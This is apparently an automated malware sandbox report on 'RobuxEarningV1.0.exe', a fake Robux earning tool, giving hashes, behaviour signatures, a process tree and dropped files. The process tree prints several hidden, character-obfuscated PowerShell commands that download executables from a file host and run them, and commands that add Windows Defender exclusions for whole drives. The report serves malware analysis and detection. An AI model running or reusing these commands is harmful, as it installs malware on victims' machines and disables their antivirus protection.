Overview

overview

10

Static

static

3

RobuxEarningV1.0.exe

windows7-x64

8

RobuxEarningV1.0.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 18:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RobuxEarningV1.0.exe

  • Size

    6.8MB

  • MD5

    40e4949832835252d7c13f380a7e34e8

  • SHA1

    40413f428911437631362398426b2f2accccaefe

  • SHA256

    96a6c1b696660babb99a2de8c47464de947a11c8982277a86fb3814c6c22ada9

  • SHA512

    7160d5701d809c6b7bee228f162dab0960a6f300e0428bc3176fca508ecbcad8841b0f663164cb6f08f6db7816af93879a6c08ecc2fd0877e2db84764e018523

  • SSDEEP

    98304:4Clb/EOLQw+R0jtL0er+6HMh1igAyKl7MIEGYPkqQMcTVfrrt5pQ:4iAOw0jxNMh1xakPkmcNK

Score
8/10
executionpyinstaller

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe
    "C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\ProgramData\-.exe
      "C:\ProgramData\-.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\ProgramData\-.exe
        "C:\ProgramData\-.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2280
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\ProgramData\SecorKit.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]53);$url+=([char]53);$url+=([char]98);$url+=([char]117);$url+=([char]117);$url+=([char]104);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]48);$url+=([char]52);$url+=([char]57);$url+=([char]48);$url+=([char]56);$url+=([char]51);$url+=([char]55);$url+=([char]53);$url+=([char]48);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]0x68);$url+=([char]0x74);$url+=([char]0x74);$url+=([char]0x70);$url+=([char]0x73);$url+=([char]0x3a);$url+=([char]0x2f);$url+=([char]0x2f);$url+=([char]0x66);$url+=([char]0x69);$url+=([char]0x6c);$url+=([char]0x65);$url+=([char]0x73);$url+=([char]0x2e);$url+=([char]0x63);$url+=([char]0x61);$url+=([char]0x74);$url+=([char]0x62);$url+=([char]0x6f);$url+=([char]0x78);$url+=([char]0x2e);$url+=([char]0x6d);$url+=([char]0x6f);$url+=([char]0x65);$url+=([char]0x2f);$url+=([char]0x35);$url+=([char]0x35);$url+=([char]0x62);$url+=([char]0x75);$url+=([char]0x75);$url+=([char]0x68);$url+=([char]0x2e);$url+=([char]0x73);$url+=([char]0x65);$url+=([char]0x63);$url+=([char]0x72);$url+=([char]0x6f);$url+=([char]0x30);$url+=([char]0x34);$url+=([char]0x39);$url+=([char]0x30);$url+=([char]0x38);$url+=([char]0x33);$url+=([char]0x37);$url+=([char]0x35);$url+=([char]0x30);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url0=''; $url0+=([char]104);$url0+=([char]116);$url0+=([char]116);$url0+=([char]112);$url0+=([char]115);$url0+=([char]58);$url0+=([char]47);$url0+=([char]47);$url0+=([char]102);$url0+=([char]105);$url0+=([char]108);$url0+=([char]101);$url0+=([char]115);$url0+=([char]46);$url0+=([char]99);$url0+=([char]97);$url0+=([char]116);$url0+=([char]98);$url0+=([char]111);$url0+=([char]120);$url0+=([char]46);$url0+=([char]109);$url0+=([char]111);$url0+=([char]101);$url0+=([char]47);$url0+=([char]99);$url0+=([char]102);$url0+=([char]117);$url0+=([char]111);$url0+=([char]105);$url0+=([char]56);$url0+=([char]46);$url0+=([char]102);$url0+=([char]117);$url0+=([char]107); $output=\"$env:PUBLIC\svhost0.exe\"; Invoke-WebRequest -Uri $url0 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url1=''; $url1+=([char]104);$url1+=([char]116);$url1+=([char]116);$url1+=([char]112);$url1+=([char]115);$url1+=([char]58);$url1+=([char]47);$url1+=([char]47);$url1+=([char]102);$url1+=([char]105);$url1+=([char]108);$url1+=([char]101);$url1+=([char]115);$url1+=([char]46);$url1+=([char]99);$url1+=([char]97);$url1+=([char]116);$url1+=([char]98);$url1+=([char]111);$url1+=([char]120);$url1+=([char]46);$url1+=([char]109);$url1+=([char]111);$url1+=([char]101);$url1+=([char]47);$url1+=([char]110);$url1+=([char]56);$url1+=([char]110);$url1+=([char]117);$url1+=([char]103);$url1+=([char]51);$url1+=([char]46);$url1+=([char]102);$url1+=([char]117);$url1+=([char]99);$url1+=([char]107); $output=\"$env:PUBLIC\svhost1.exe\"; Invoke-WebRequest -Uri $url1 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2076
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url2=''; $url2+=([char]104);$url2+=([char]116);$url2+=([char]116);$url2+=([char]112);$url2+=([char]115);$url2+=([char]58);$url2+=([char]47);$url2+=([char]47);$url2+=([char]102);$url2+=([char]105);$url2+=([char]108);$url2+=([char]101);$url2+=([char]115);$url2+=([char]46);$url2+=([char]99);$url2+=([char]97);$url2+=([char]116);$url2+=([char]98);$url2+=([char]111);$url2+=([char]120);$url2+=([char]46);$url2+=([char]109);$url2+=([char]111);$url2+=([char]101);$url2+=([char]47);$url2+=([char]104);$url2+=([char]98);$url2+=([char]108);$url2+=([char]50);$url2+=([char]105);$url2+=([char]103);$url2+=([char]46);$url2+=([char]115);$url2+=([char]101);$url2+=([char]99);$url2+=([char]114);$url2+=([char]111); $output=\"$env:PUBLIC\svhost2.exe\"; Invoke-WebRequest -Uri $url2 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mountvol | find ":"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\mountvol.exe
          mountvol
          4⤵
            PID:3028
          • C:\Windows\system32\find.exe
            find ":"
            4⤵
              PID:3040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3056
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath MOUNTVOL
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath Possible
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath C:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath F:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1332
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c add-mppreference -exclusionpath D:\
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1376

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\SecorKit.bat
        Filesize

        4KB

        MD5

        16761e8a23d0d4a636ca414cc5b15d7a

        SHA1

        9ff21e1bed5aa608f170294e800812ebe3c7fbff

        SHA256

        a52a64316c6c417abf09c36e60e2cfe492d051a5a696eeb3b1abb7c91c05734c

        SHA512

        7ebb6376ed87e1deeed99aac5c6120e9a9224aaf0a853c61e8f09709d4038a60c28899e69bdf3b2c2657633da01ac335f80bc6e5ddef0b891739ab80b4258fb8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI28122\python311.dll
        Filesize

        5.5MB

        MD5

        65e381a0b1bc05f71c139b0c7a5b8eb2

        SHA1

        7c4a3adf21ebcee5405288fc81fc4be75019d472

        SHA256

        53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

        SHA512

        4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        8e7545e0cd2beac6afe4a94c06368d60

        SHA1

        284367ca3761ca5fb45b3f9c7c0e5ca5df05a0e2

        SHA256

        c4d6bf48bf4ec15a02394ea49d3352de9556c06c706c873f6def83483ac2b87e

        SHA512

        13f46d57869cbff7435964bd77a98fffafa25a1369330ab18b4624c56cabadcd4d44d4d53d443e1c936ace2abc4ddb4182ca3d96470cc6458106dbc2accfccb3

        Download Submit

      • \ProgramData\-.exe
        Filesize

        6.8MB

        MD5

        30e2452a76d6a5c739a2b1790a269c35

        SHA1

        fb2f8ddfcf04e02effb15a2dd1a1e903871258e5

        SHA256

        30abf86701b5915651ebcbc4f1c271fe8e4d3a3627826b253ccf20c304b258d9

        SHA512

        3042b3abd47a5393fc31a3aef23a1ba26704d2e22242ec4ca9de0d2b8e71c6ad0361d7659eb58b88b1e6fae4f4459574d852e9804aeb91ed64d7b2bc931275ed

        Download Submit

      • memory/332-44-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/332-45-0x00000000022B0000-0x00000000022B8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2448-0-0x000007FEF55A3000-0x000007FEF55A4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2448-1-0x00000000012F0000-0x00000000019CA000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2880-37-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2880-38-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

        Filesize

        32KB

        Download